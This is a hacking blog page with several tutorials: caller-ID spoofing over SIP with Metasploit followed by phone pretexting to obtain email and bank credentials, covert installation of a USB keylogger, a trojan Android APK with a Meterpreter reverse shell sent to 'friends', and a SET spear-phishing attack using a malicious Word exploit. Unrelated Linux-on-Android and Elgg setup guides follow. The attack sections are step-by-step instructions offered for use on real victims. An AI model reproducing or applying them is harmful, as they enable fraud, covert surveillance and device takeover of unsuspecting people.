Search Here

Sunday, 31 July 2016

Learn How Elliot from Mr. Robot Hacked into His Therapist's New Boyfriend's Email & Bank Accounts (Using Metasploit)

In Mr robot there was a time, we saw Elliot using social engineering to gain access to his therapist's boyfriend's email and bank accounts by calling him and pretending to be someone from his bank, then Elliot asked him for some info that were really useful to gain access to his account, the target believed to be someone from the bank and gave him the info Elliot was looking for.

But How Is It in the Real World?

Gathering information about a target remotely is easy, but learning about the person behind the screen is important too. You can't always gather that information by just googling or using website offering info about people or institutions, sometimes you have to get this info directly from the user,in the real world, Bazzell said, most breaches we hear about start with social engineering. He said they usually occur through a malicious email or by tricking an employee, so this is what are we going to learn today.

What Are We Going to Do?

Today i'm going to show you how you can trick an employee to give you all the info to successfully hack the company, using metasploit and softphone.
Introduction about SIP and voip
Due to its increasing reliability and accessibility, in recent years, internet telephony technology has become a plausible choice for many businesses, allowing them to cut down on their communication costs whilst enjoying a rich communication experience.
SIP and VoIP provide the foundations for IP technology. Both technologies provide ample benefits and opportunities for the user to save money whilst increasing their productivity. Each protocol has pros and cons, and they are often used together.
All of us were already at least once in life been in an office, and we noticed the presence of one or more landline telephones, mainly in the area of customer service, but these days most companies no longer use those landline telephones, instead companies have adapted the use of ip phones (SIP,VOIP), which are sometimes free(SKYPE) and can be accessed anywhere in the world , all you need is the public SIP address that follows you much like your email address would. It doesn't really matter where you are or what device you use; as long as you're logged in (registered), SIP communications will be redirected to your current location.
Session Initiation Protocol, (SIP), is a powerful and efficient communications protocol which can be used to send multimedia messages to multiple parties - allowing people around the world to communicate over the internet using their computers and mobile devices
Voice over IP (VoIP) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.
For more info about these protocols you can google it in case you don't understand them.

REAL WORLD EXAMPLE

For this example we are going to use google as target company, but you could change google to the name or domain of your target company or entity, Softphone as our voip phone also called ip phone, and metasploit to create a fake SIP invite request making the targeted device ring and display fake caller id information, because in the real world users would believe only trusted caller(But for some people you dont even need all this process).
Before we start a softphone is a software program for making telephone calls over the Internet using a general purpose computer, rather than using dedicated hardware. The softphone can also be installed on a piece of equipment such as a workstation, portable computer, tablet or even a cellphone and allows the user to place and receive calls without requiring an actual telephone set, at its available for linux too, enough theory for today fire up your kali linux and download softphone
apt-get install sflphone-gnome
As you can see from the below pic, i have already downloaded the softphone, skip it in case you have it too.
Once yo done downloading you can access the softphone by navigating through applications--->usual applications--->internet and you will see the softphone installed there, just click on the icon to open it(lol i bet you already know how to open programs).
When you open it for the first time, you will be prompted with a screen like the one below, for now just set everything as below and click next
Now when you get the phone on your screen go to edit-->accounts---> and choose "ip2ip" click on edit and choose advanced
On network interface choose your network interface and leave the port as default, in my case i'm using eth0 as interface, you can choose any.
For now we are done configuring our ip phone.

The Hack

We will be using metasploit to hack our softphone, this is intended for users that knows how to use metsploit.
The module we will use will create a fake SIP invite request making the targeted device ring and display fake caller id information.
The commands:
msfconsole
use auxiliary/voip/sip_invite_spoof
To see the options(please don't copy it, its not a command simply to economize time)

Understanding the Module

The DOMAIN is the sip domain, in our case as we will be working locally, we can just skip it, it could be something like google, wonderhowto or any other as long they have a sip domain.
The EXTENSION is the target identity inside the network, record for SIP does the same thing as a mail exchange record for email,lets say the sip domain is google, the extension of a target could be something like voice.john@google.com
The MSG is the spoofed caller id to send in our case we will pretend we are from the it department of google
The RHOSTS is the target ip, in my case my softphone is installed in my localhost with the ip 192.168.0.101
The SRCADDR is the spoof call sip address, in our case it will be voice.admin@google.com, to make the target(employee fro google in our case) thinking that its coming from google it department.
When we run it we will receive a call apparently coming from google it department, but it was just a spoofed identity as we can see from the below pic.
Of course its rare for you to get it working on google, but if you can try in some other companies or entities, all you need is just their voip ip address or you can just be in the same network and scan for ip with the following open ports : 5060, 5070, 10000-65535 default ports for a lot of voip services.
You can see that our softphone use the port 5060
Another thing you could do as well is to send an invitation over all the ip on the network, you just need to set the RHOSTS to a range of the ip on the target network in my case it could be
Once it finds an ip running sip on 5060 it then send an invitation as you can see from the above pic, this time we send an invitation over the network

What Now? How Can I Get Someones Email, or Bank Account Passwords with This?

Now its all about social engineering, once the user accepts the call use your best to trick him to give the info you are looking for.
In our example using google you could say that you are recently working on some new security app for google employees and would like to update employee's data, with more time you can figure out exactly what to say to gain access of their account, because they will think you are working in the it department of google, they might or not give you info, but its all about good talking.
Just like Elliot did, we could call to the target bank and pretend we are from It department and we would like to get some info about an user(our target) and so on...
Thats all for now, if i did mistake any thing or you would like to add your opinion, such as how you would trick the employee you are welcome...
see you soon and happy hacking...
Also See :- How To Install Linux On Your Android Without Rooting
Also See :- Deploy a Keylogger From a USB Flash Drive Quickly

Deploy a Keylogger from a USB Flash Drive Quickly

Step 1You Will Need...

For this guide you will need a few things first:
  • A cheap memory stick / USB flash drive (any capacity)
  • Shadow Keylogger (free) which you can download free from here
  • The computer you want to record (i.e, your own)

Step 2A Few More Things Before We Start...

You will also need to ensure that the computer you want to record:
  • Is running some version of Windows (this will not work on Mac or Linux)
  • Has the .NET Framework 2.0 or later (almost all do, but if not you can download free from here)

Step 3Download Shadow Keylogger

We will need to set things up on the USB Flash Drive first, so on another computer, plug in your Flash Drive and open it through 'My Computer' or it may pop up a small window automatically. Leave this window open.
Now, download the keylogger from this link. This will download a .ZIP folder, which you will need to open. Inside the folder there will be a file called 'sk.exe', this is the keylogger program.
Click on the program and drag it across into your USB Flash Drive. Once it has been copied, you can close the .ZIP folder.

Step 4Create an Automatic Setup File

Although the program will run fine at the moment, when you open Shadow Keylogger, you will have to create a password in order to start recording. However, this will take a little bit of time, which you may not have. So Shadow Keylogger has a clever feature where you can tell it to run automatically with a few pre-defined settings. For a full guide on how to create one of these files, you can watch our YouTube video.
In this guide, I will show you how you can configure it to start recording automatically. Open Notepad, or any other half-decent text editor, then copy this block of XML and paste it into your document:
<?xml version="1.0" encoding="UTF-8" ?>
<config>
<Password>password123</Password>
<StartRecordingImmediately>1</StartRecordingImmediately>
<AccessMode>Automatic</AccessMode>
<AccessIcon></AccessIcon>
<IncludeTimestamp>1</IncludeTimestamp>
<SaveKeystrokes>0</SaveKeystrokes>
<SaveKeystrokesDir></SaveKeystrokesDir>
<SaveKeystrokesRate></SaveKeystrokesRate>
<TakeScreenshots>0</TakeScreenshots>
<TakeScreenshotsDir></TakeScreenshotsDir>
<TakeScreenshotsRate></TakeScreenshotsRate>
<TakeScreenshotsQuality></TakeScreenshotsQuality>
</config>
I have highlighted the password bit above, since this is where you enter your own password. You will need to remember the password you chose, because after you have finished recording, you need to type it on the keyboard to see all of the recorded keystrokes.
For this guide, you don't need to change any of the other values.
Lastly, click 'Save As' and navigate to the USB Flash Drive and make sure it is in exactly the same folder as the program (sk.exe). Save the file as 'config.xml' (without the quotation marks) and make sure the dropdown menu is changed to 'All Files', and not 'Text files'. Then hit 'Save'!

Step 5Now Try It!

You're done! Now, just pull the USB Flash Drive out of your computer. Approach the target computer, plug the USB Flash Drive in any available port.
On some computers, it may open the drive folder automatically, on others it may have a small prompt box, where you need to click on the 'Open Files and Folders' option. In a handful of cases, you may even need to open 'My Computer'.
When the drive folder opens, just double-click on the 'sk.exe', or click it and hit enter.
Shadow Keylogger will open immediately, realise you've already given it a password, and just start recording automatically.
You can then immediately pull out your USB Flash Drive from the computer. The folder will close automatically, and you can walk away.
Return later (for this particular setup, it has to be before the user shuts the computer down) and simply type your password onto the keyboard, it doesn't matter where.
The results window will then appear with all of the recorded keystrokes.

Friday, 29 July 2016

How to Install Linux On Your Android Phone Without Rooting

linux-on-android-1

Step 1: Installation of GNURoot from Play Store

The first and foremost step is to install the free Android app GNURoot on your Android app. This application installs a fake Linux root file system. Just open the Play Store, search for GNURoot and install the main GNURoot app on your Android device.
linux-on-android-

Step 2: Select the helper app of a Linux distro

By default, GNURoot offers different ARM-based Linux distros: (Debian) Wheezy, Fedora, Aboriginal (a lightweight BusyBox variant) and Gentoo. Select any one of these and tap “Create New Rootfs” to download the needed files.
This process may take a while, so wait for few minutes.
linux-on-android

Step 3: Select the Linux distro and launch

After the download is finished, select that distro from the second drop down option. After ticking the “Launch as Fake Root” box to get the apt-get and other root commands, tap “Launch Rootfs” to install and use Linux on Android phone.

Step 4: It’s ready to use

Afte the installation, you are ready to use Linux on Android phone. Now you should be able to install any package from your distro’s repo using the relevant package manager by apt-get for Wheezy or yum for Fedora.
You can create extra terminal windows by tapping on the ‘+’ button at the top and switch using the top-left drop-down menu.
To access the menu options for various settings, you can tap on the top-right icon and other options.

How to go graphical with Linux on Android phone?

In the four main Linux distros available in GNURoot app, you’ll have to work using the command line. To run the programs needing windows, you’ll need a GUI. This can be implemented using GNURoot WheezyX distro (in the first step). It launches a VNC server, and to see the GUI you need to download VNC Viewer from the Play Store.
For the first time, after the WheezyX distro launches in a terminal window, fire up the VNC viewer app and enter ‘localhost:1’ as address and ‘password’ as the default password.
Doing this, a virtual desktop for a xterm terminal window for Wheezy will launch. Now using the mouse pointer and keyboard icon, you can navigate the Linux on Android.
Did you find this how to install Linux on Android phone tutorial helpful? Tell us in the comments below.

Hack Android Using Kali (Remotely)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:
------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.
Thank You!
F.E.A.R.

How to Spear Phish with the Social Engineering Toolkit (SET) in BackTrack

Many newbie hackers focus upon the technical aspects of hacking and fail to give enough attention to social engineering. In fact, I would say that technical hacks should ONLY be attempted if social engineering attacks fail. Why bother spending hours or days trying to hack a password if someone will simply give it to you?
Social engineering is the act of getting people to give you the information you seek, usually by gaining their trust. That trust may be gained by posing as someone in authority, a colleague, or just someone who needs help. Some of the best hackers in history, including Kevin Mitnick, have been great social engineers.
BackTrack has a tool to assist and automate social engineering attacks called SET, or the Social Engineering Toolkit. SET was developed by David Kennedy and simplifies a number of social engineering attacks such as phishing, spear-phishing, malicious USBs, etc. Furthermore, it has been integrated with Metasploit so that we can use Metasploit exploits and payloads in our social engineering attacks.
The current version of the Social Engineering Toolkit includes the following types of attacks.
  • Spearphishing
  • Websites
  • Malicious USBs
So, let's fire up our BackTrack and explore the Social Engineering Toolkit!

Step 1Open SET

To start using the Social Engineering Toolkit, go to BackTrack, then Exploitation Tools, then Social Engineering Tools, then Social Engineering Toolkit, and click on set.

Step 2Pick Your Type

This should open the main menu for the Social Engineering Toolkit. Note that it offers:
  • Spear-Phishing Attacks
  • Website Attacks
  • Infectious Media Generator
  • Create a Payload and Listener
  • Mass Mailer Attack
  • Arduino-based Vector Attack
  • SMS Spoofing Attack
  • Wireless Access Point
  • And many others
In this tutorial, we'll be looking at creating a spear-phishing attack. For those of you not familiar with this terminology, a phishing attack is an email attack with a broad "net" in an attempt to try to pick up a few random victims. A spear-phishing attack is similar, except that it targets one or a few individuals. In other words, it's a targeted social engineering attack, hence the spear.

Step 3Spear-Phish

Let's now select number 1 from the menu and begin our spear-phishing attack. When we do, we will be greeted with the screen below.
It explains what a spear-phishing attack is and asks us how we want to go about our attack. We can choose:
  1. Mass email attack
  2. FileFormat payload
  3. Social engineering template
Let's select a FileFormat attack. Type number 2 and press enter.

Step 4Choose an Attack

After we select our FileFormat type attack, we will be asked what type of exploit we would like to use. Notice that the default is the PDF with the embedded .exe. In this hack, let's use the Microsoft Word RTF Fragments attack or MS10_087.
This will create a Word document that will overflow a buffer and enable us to put a listener or rootkit on the victim's machine. Type 4 and press enter.

Step 5Choose a Payload

Now that we have decided what type of file we want to use in our attack, our next step is to decide what type of listener (aka rootkit, aka payload) we want to leave on the victim system. These may look familiar to those of you who have used Metasploit as these are Metasploit payloads.
Let's be ambitious and try to get the Metasploit meterpreter on that victim's machine. If we are successful, we will completely own that system!

Step 6Create the File

After we type number 5 and press enter, we must choose what port we want to listen on (the default 443). SET then goes about creating our malicious file for us. It names that file template.rtf.

Step 7Rename the File

If we want to trick the victim into opening the file, we should name it something that sounds enticing or familiar to the victim. Now this will differ depending upon the victim, but in our scenario we're trying to spear a manager at a large company, so let's call it SalesReport, something he or she might actually be expecting in their email.

Step 8Create the Email

Now that we have created the malicious file, we now need to create the email. This is important. If we're to get the victim to open the file, the email must look legitimate. SET prompts us whether we want to use a pre-defined template or a one-time-use email template. Let's be creative and choose a one-time-use email.
SET then prompts us for the subject of the email. In this case, I used Sales Report. SET then asks us whether we want to send it in html or plain text. I chose html to make it look more inviting and legitimate. Finally, SET prompts us to write the body of the email and then type Control + C when we are finished. I wrote:
Dear BigShot:
Please find attached my quarterly sales report. If you have any questions, please feel free to ask.
Sincerely,
Your Minion
Of course, your email will differ depending upon who you're sending it to, but try to make it sound enticing and legitimate or they aren't likely to open the attached malicious file and our attack will fail.
When we're finished, SET will ask us whether we want to use a Gmail account or send it from our SMTP server. In most cases, we will want to use a Gmail account. Simply type in your address (you might want to create an anonymous email account for this purpose) and password, and SET will send the email you created with the malicious attachment from this Gmail account.
We will be using some of the other features of the Social Engineering Toolkit in future tutorials, so keep coming back!

Thursday, 28 July 2016

How to Build Your Own Social Networking Website

As of today, there are quite a good number of social networking platform exist- commercial, cloud-based and open source. We will see the list of available platforms, but will pick the best one for building our own.

1. Elgg

An award-winning social networking engine. Completely open source, PHP based and very powerful. Elgg powers networks for a wide range of organizations including Australian Government, British Government, Wiley Publishing and many more.

2. CommunityEngine

A free, open-source social network plugin for Ruby on Rails applications. Drop it into your new or existing application, and you’ll instantly have all the features of a basic community site.

3. SocialEngine

Commercial and very powerful. Available as cloud or self-hosted solution. We will probably not look at this.

 4. Ning

Commercial but cheaper than SocialEngine. Built from the ground up for social, Ning’s scalable hosted platform gives you the tools and expertise you need to publish and connect with your community.

5. phpFox [updated]

Commercial and ready to go  social network for your business. It is modular based allowing you to easily plug-in or plug-out a feature with a click on a button. This allows developers to easily develop new and awesome features to further extend your communities capabilities.
Okay, enough talk about existing solutions, what we are really interested in is to build our own social networking website and show off to our friends. So let’s begin – and yes as we said, we will always go with the best one instead confusing users with some sort demo of all. From the above list, Elgg is the one for us.

 1. Setting Up Development Environment

Since Elgg is a PHP-based social networking platform which uses MySQL as back-end,  to get started with it; we need to setup a PHP based development environment on our local system. Once you have built and configure the complete solution and you feel that it’s ready to go live, we will point you to our article on how to make it live on internet. Follow the following steps to setup your PHP development environment –
  • Download and install XAMPP for your platform from here. It has all required component for setting up PHP development environment.
  • Open XAMPP control panel from start menu and enable Apache and MySql services.
XAMPP control panel
XAMPP control panel

  •   Open http://localhost in you browser. You will see a splash page of XAMPP, select your language and it will open XAMPP web admin panel.
XAMPP web control panel
XAMPP web Admin panel
If you are seeing that page than well done you have setup your development environment.
There is one important thing we should never forget to do is to check the security settings. Click on the security link on the left sidebar of the admin panel. You will see that MySQL has root user but no password and hence showing insecure –
xampp-security-page
xampp security page
Let’s secure MySQL by clicking on the link http://localhost/security/xamppsecurity.php and setting up the password for MySQL root user –
mysql password setting
mysql password setting
Once you set the password for MySQL. Restart the MySQL service from XAMPP control panel and come back to the security page. You will see that now it’s secure. Remember the password you have setup because you will need it while installing Elgg.
security enabled
security enabled
Alternatively you can also watch this video:

 2. Installing Elgg

Download the latest Elgg package from https://www.elgg.org/download.php. Extract the downloaded zip file and rename the extracted folder to the name you want to give to your social networking website e.g. mysocialnetwork
elgg folder renamed
Now open your XAMPP directory and move to htdocs folder and copy the above mysocialnetwork folder here.
htdocs - web root directory
htdocs – web root directory
Now go to your browser and type http://localhost/mysocialnetwork, you will see following page
Elgg-Install
Elgg-Install
Follow the installation wizard and setup your social network –

Requirement Check –

requirments check
requirments check
If requirements check is okay you can move to next step.

Database Installation –

We already setup password for our database root user. We will now use these settings but before that go back to your XAMPP admin panel and click on the phpMyAdmin link on the left sidebar under Tools section. phpMyAdmin is web-based front-end for our MySQL database. Login to phpMyAdmin using root user and your password, it will open following page where we can manage your databases –
phpMyAdmin
phpMyAdmin
Now create a database for your social networking website which we will use in database installation setup of Elgg. e.g. we create mysocialnetwork database.
create database for your social network
create database for your social network
In database installation step of the Elgg installation wizard fill up the required fields and click next –
database setup
database setup

Configuring Site –

In this step give your social networking website a Name. If you have a mail server on your local you can give some mail address for now just give admin@yourmailserver.com. For the data directory create a directory to store your social networking data and give the absolute path here. e.g.we created mysocialnetworkdata in c:\
configuring site
configuring site

Create Admin Account –

You will need a master admin account to manage your website. With this account you can control your social networking website, it’s users and contents. Create an admin account and click next –
create admin account
create admin account

Get Ready For Awesome –

If you are seeing the following page, then everything is fine and you are a click away to see your awesome social network. Grab a beer and click on “Go to site” 🙂
finished
finished

 3. First Look at Your Social Network

You have setup your development environment, installed and configured your social networking website. It’s time you see how it looks. On the administration page, click on visit site link present at right side of the top bar –
first look
first look

 4. Administration

You have your own social network website up and running. Now you can use the administration panel to make this site as you want. You can change the look and feel, functionality, add plugins for more features and much more. Admin panel can be accessed at http://localhost/mysocialnetwork/admin with the credentials you have created while installing Elgg.
administrator panel
administrator panel
Managing Elgg and explaining every functionality is a huge topic and out of scope of this article. But we will give you enough resources, tutorials, books and examples to help you out in building your next great social network.
e.g. Let’s change you site theme to look like facebook
mod folder
mod folder
  • Enable it from Administration Panel
administration panel enable facebook theme
enable facebook theme
  • Click on visit site link and you will see that your site now looks like old facebook. Please remember that this plugin is very old and not been updated so you might see errors in it because new Elgg version is not compatible with it. We have used it just for demonstration purpose –
facebook-theme-enabled-on-site
facebook theme enabled on site

Here are some useful resources that will help you build your Elgg site further –
Learning Resources:
Official Documentation
Recommended Books:
Elgg Social Networking – Mayank Sharma
Elgg 1.8 Social Networking: Cash Costello